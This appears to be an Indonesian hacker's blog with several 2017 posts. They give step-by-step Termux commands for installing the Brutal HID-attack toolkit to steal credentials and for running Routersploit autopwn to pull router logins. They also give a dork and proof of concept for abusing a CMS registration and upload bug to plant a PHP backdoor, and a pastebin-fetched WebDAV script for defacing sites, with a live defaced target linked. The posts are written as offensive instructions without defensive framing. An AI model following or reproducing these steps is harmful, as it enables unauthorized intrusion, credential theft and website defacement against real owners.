Kamis, 19 Oktober 2017

Cara Install Brutal Toolkit di Android Via Termux


Halo selamat siang guys apa kabar balik lagi sama saya ghost_clown
Kali ini saya akan memberikan tutorial install Brutal Toolkit di Android dengan Termux

Sedikit penjelasan
 Brutal toolkit adalah tool yang menyuguhkan HID (Human Interfaes Device) attack yang mirip rubber ducky  yang dibuat Darren Kitchen. HID attack itu adalah waktu kita colokin device ini ke laptop atau komputer dia akan ke detect jadi keyboard mouse josytick . Kalian yang sudah mengikuti Mr.Robot dan menyimak adegan dimana Angela mencolokkan usb ke komputer untuk mendapatkan informasi penting.Sayangnya harga Rubber Ducky seperti yang digunakan Angela dalam adegan Mr.Robot mungkin masih mahal bagi kalangan menengah kebawah. Nah disini developer TheFatRat yakni Edo Maland sudah mengembangkan tools untuk "menyulap" Teensy menjadi alat yang fungsinya mirip dengan Rubber Ducky. Teensy ini microcontroller kecil yang hampir sama di rubber ducky tapi perbedaanya hanya di payload nya aja.

Untuk Teensy nya kalian bisa beli di Bukalapak atau yang lain. Terserah beli dimana. Teensy digunakan untuk memasukkan payload kedalam Teensy nya



Langsung ke tutorialnya aja ya guys

Bahan

1.pastikan kalian punya aplikasi Termux
2.Ane Rekomendasikan install Fedora dulu/Ubuntu di termux kalian
3.Koneksi  Internet

Cara Installnya


$git clone https://github.com/Screetsec/Brutal.git

Kalau sudah selesai Buka fedora / Ubuntu di termux kalian,
Karena disini saya pakai fedora jadi begini langkahnya

$startfedora
$cd Brutal
$chmod +x Brutal.sh
$sh Brutal.sh
Dan



Udah ke install deh :) gampang kan

Jika kalian ingin seperti Angela dalam Mr.Robot saat mendapatkan informasi credential menggunakan usb, kalian bisa pilih opsi payload 3 dan 4 dalam tools Brutal


Sekian tutorial dari saya apa bila ada salah kata saya mohon maaf ,pantengin terus blog saya karena akan ada update tutorial tips & trik lainnya see you next time guys

Thanks:
#Linuxsec
#Anonymous Cyber Team




Minggu, 15 Oktober 2017

cara menggunakan Routersploit

Halo selamat siang guys ,kembali lagi dengan saia ghost_clown ,gimana kabarnya ?masih jomblo sampai hari ini :v, mangkanya jangan di depan laptop mulu :)

Nah pada kesempatan kali ini saya akan memberikan tutorial cara menjalankan Routersploit di termux 
Bagi kalian yang belum instal bisa lihat di sini ~> touch me :)

Nah langsung saja ke langkah langkahnya ya guys

1. Buka direktori routersploit dan buka routersploit

$cd routersploit
$./rsf.py
2. Ketik
$use scanners/autopwn
$show options
$set target 192.168.1.1(gunakan ip target kalian jangan yang ini)
$set port 8080
$set theards 10
$run

Nah setelah selesai akan muncul banyak tuh jika vuln akan muncul seperti gambar di atas
Jika tidak vuln maka akan seperti ini
Nah jika vuln tinggal ketik exploitnya,kalau beruntung kalian akan mendapat user dan pass nya
Sekian tutorial dari saya semoga bermanfaat
Pantengin terus blog kami untuk tips trik dan tutorial yang lainnya
Selamat siang guys :)

Thanks to
#Anonymous Cyber Team

Jumat, 06 Oktober 2017

Bug Register di CMS Suarakalibata


Halo gengs
Kembali lagi dengan saya si gans ghost_clown ~(°v°~)
Nah kali ini saia akan share tutorial deface dengan CMS suarakalibata


#Author : Yrid06 -
                  T1KUS90T
#Dork  :intext:"PENDAFTARAN UNTUK KONTRIBUTOR ARTIKEL"


CMS Swarakalibata adalah CMS Lokomedia yang dimodifikasi oleh Rizal Faizal, Dan sekarang sudah dikembangkan lebih jauh lagi oleh phpmu.com
Bug Register & Upload ini sangat memungkinkan Attacker untuk mendaftar menjadi Admin/Kontributor dan meng-upload backdoor dengan extensi PHP di module berita tanpa harus mem-bypass extensi backdoor tersebut.

Proof Of Concept :

1.dorking di browser kalian
2.Masuk kehalaman register dengan menambahkan register.html pada akhir url target.
Lengkapi form pendaftaran, pilih foto ( cobalah buat membypas extensi shell kalian ).

3.Klik daftar sekarang, dan kalian akan dialihkan ke halaman Administrator.
4.sekarang terserah kalian mau di apain webnya :)

Thanks To :
#T1KUS90T
#xdecode-tools.blogspot.co.id
#Anonymous Cyber Team

Minggu, 01 Oktober 2017

cara install webdav di termux



Assalamualaikum wr.wb
Selamat malam guys
Kembali lagi dengan saya ghost_clown
Nah pada kesempatan kali ini saya akan memberikan tutorial INSTALL WEBDAV DI TERMUX

Nah biadanya webdav kan cuma bisa di pc / komputer ,nah ini jadi kabar gembira bagi defacer user android :3 kini webdav hadir di android via termux

Bahan yang harus kalian cari
1.TERMUX (download di play store)

Langsung ke tutornya ae ya guys

$ apt update && upgrade
$ apt install python2
$ pip2 install urllib3 chardet certifi idna requests
$ apt install openssl curl
$ pkg install libcurl
$ ln -s /sdcard
$ cd sdcard
$ mkdir webdav
$ cd webdav
$ curl -k -O https://pastebin.com/raw/HnVyQPtR
$ mv HnVyQPtR webdav.py
$ python2 webdav.py

#Note
Script Deface Pindahin Sendiri Ke Sdcard/webdav

Cara menjalankanya gimana ??
Ok gini caranya
Ketik
$ python2 webdav.py http://sitetarget.com sckalian.htm
Tunggu sampai proses uploade selesai
Kalau berhasil akan seperti ini
Nah kaya gitu

Live target : http://adtrafficweb.grupoeugenio.com.br/look.htm
Sekian tutor dari saya ,jangan lupa pantengin trus blog saya duntuk update tutorial tips dan trik yang lainya
Selamat malam :3


Post By : Mr_/bon'007 (AndroSec1337 Cyber Team)

#Tools Title : WebDav
#Author by: ./Xi4u7
#repost  & reedit by: ghost_clown

exploit android dengan metasploit di termux

Halo guys Kembali lagi sama saya ghost_clown Gimana nih kabarnya ,udah lama nih saya ngga update sesuatu di blog Kali ini saya akan sha...